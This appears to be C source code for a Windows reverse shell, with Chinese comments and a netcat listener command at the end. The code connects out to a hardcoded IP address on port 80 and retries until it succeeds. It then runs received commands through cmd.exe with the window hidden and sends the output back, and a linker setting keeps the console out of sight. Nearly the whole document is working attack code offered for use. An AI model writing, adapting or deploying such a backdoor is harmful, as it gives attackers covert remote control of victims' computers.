#pragma comment(lib,"ws2_32.lib")


#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#endif

#include <winsock2.h>
#include <windows.h>


int main(int argc,char **argv)
{
char *messages = "======================== Connect successful !========================\n
 
";
WSADATA WSAData;
SOCKET sock; //創建套接字
SOCKADDR_IN addr_in;
char buf[1024]; //buf作為socket接收數據的緩沖區
memset(buf,0,1024); //清空緩沖區
 
WSAStartup(MAKEWORD(2,2),&WSAData); //初始化ws2
 
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(80); //反向連接的遠端主機端口
addr_in.sin_addr.S_un.S_addr=inet_addr("59.110.167.239
 
"); //遠端IP
 
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 
while (WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) //連接客戶主機
{
Sleep(5000); //連接失敗，停頓5s，再試
continue;
}
 
send(sock,messages,strlen(messages),0); //發送success信息
 
char buffer[2048] = {0};//管道輸出的數據
 

 
for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){
SECURITY_ATTRIBUTES sa;//創建匿名管道用於取得cmd的命令輸出
HANDLE hRead,hWrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
 
CreatePipe(&hRead,&hWrite,&sa,0); //創建管道
 
STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si); //STARTUPINFO 結構
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE; //隱藏窗口
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
 
GetSystemDirectory(cmdline,MAX_PATH+1); //獲得系統路徑
strcat(cmdline,"//cmd.exe /c"); //路徑+/cmd.exe
 
int len=recv(sock,buf,1024,NULL);
if(len==SOCKET_ERROR) exit(0); //如果客戶端斷開連接，則自動退出程序
 
strncat(cmdline,buf,strlen(buf)); //把命令參數復制到cmdline
 
 
 
CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi); //創建進程
 
 
CloseHandle(hWrite);
 
for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL); //循環讀取管道中數據並發送，直到管道中沒有數據為止
memset(buffer,0,2048)){
send(sock,buffer,strlen(buffer),0);
}
 
}
return 0;
 
}

nc執行命令：nc命令 ： -l -v -p [端口]

C語言通過匿名管道實現反彈式CMDShell